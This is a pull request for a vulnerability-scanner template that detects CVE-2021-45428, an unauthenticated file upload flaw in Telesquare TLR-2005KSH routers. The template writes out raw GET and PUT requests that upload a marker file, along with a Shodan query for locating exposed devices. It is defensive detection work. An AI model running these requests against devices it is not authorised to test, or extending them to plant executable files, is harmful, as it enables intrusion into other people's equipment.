### PR TITLE
Create CVE-2021-45428.yaml

### DIFF
--- a/cves/2021/CVE-2021-45428.yaml
+++ b/cves/2021/CVE-2021-45428.yaml
@@ -4,35 +4,36 @@ info:
   name: Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Upload
   author: gy741
   severity: critical
-  description: TLR-2005KSH is affected by an incorrect access control vulnerability. THe PUT method is enabled so an attacker can upload arbitrary files including HTML and CGI formats.
+  description: |
+    TLR-2005KSH is affected by an incorrect access control vulnerability. THe PUT method is enabled so an attacker can upload arbitrary files including HTML and CGI formats.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-45428
     - https://drive.google.com/file/d/1wM1SPOfB9mH2SES7cAmlysuI9fOpFB3F/view?usp=sharing
     - http://packetstormsecurity.com/files/167101/TLR-2005KSH-Arbitrary-File-Upload.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-45428
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2021-45428
     cwe-id: CWE-639
   metadata:
+    verified: true
     shodan-query: http.html:"TLR-2005KSH"
-    verified: "true"
-  tags: cve,cve2021,telesquare
+  tags: cve,cve2021,telesquare,intrusive,fileupload
 
 requests:
   - raw:
       - |
-        GET /nuclei.txt HTTP/1.1
+        GET /{{randstr}}.txt HTTP/1.1
         Host: {{Hostname}}
 
       - |
-        PUT /nuclei.txt HTTP/1.1
+        PUT /{{randstr}}.txt HTTP/1.1
         Host: {{Hostname}}
 
-        nuclei
+        CVE-2021-45428
 
       - |
-        GET /nuclei.txt HTTP/1.1
+        GET /{{randstr}}.txt HTTP/1.1
         Host: {{Hostname}}
 
     req-condition: true
@@ -40,6 +41,8 @@ requests:
     matchers:
       - type: dsl
         dsl:
-          - "status_code_1 == 404 && status_code_2 == 201 && status_code_3 == 200"
+          - 'status_code_1 == 404 && status_code_2 == 201'
+          - 'contains(body_3, "CVE-2021-45428") && status_code_3 == 200'
+        condition: and
 
 # Enhanced by mp on 2022/05/19

--- a/cves/2021/CVE-2021-45428.yaml
+++ b/cves/2021/CVE-2021-45428.yaml
@@ -1,0 +1,45 @@
+id: CVE-2021-45428
+
+info:
+  name: Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Upload
+  author: gy741
+  severity: critical
+  description: TLR-2005KSH is affected by an incorrect access control vulnerability. THe PUT method is enabled so an attacker can upload arbitrary files including HTML and CGI formats.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-45428
+    - https://drive.google.com/file/d/1wM1SPOfB9mH2SES7cAmlysuI9fOpFB3F/view?usp=sharing
+    - http://packetstormsecurity.com/files/167101/TLR-2005KSH-Arbitrary-File-Upload.html
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2021-45428
+    cwe-id: CWE-639
+  metadata:
+    shodan-query: http.html:"TLR-2005KSH"
+    verified: "true"
+  tags: cve,cve2021,telesquare
+
+requests:
+  - raw:
+      - |
+        GET /nuclei.txt HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        PUT /nuclei.txt HTTP/1.1
+        Host: {{Hostname}}
+
+        nuclei
+
+      - |
+        GET /nuclei.txt HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code_1 == 404 && status_code_2 == 201 && status_code_3 == 200"
+
+# Enhanced by mp on 2022/05/19


### PR DESCRIPTION
### Template / PR Information

Hello,

Added CVE-2021-45428
 
```
TLR-2005KSH is affected by an incorrect access control vulnerability. THe PUT method is enabled so an attacker can upload arbitrary files including HTML and CGI formats.
```

- References: http://packetstormsecurity.com/files/167101/TLR-2005KSH-Arbitrary-File-Upload.html

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO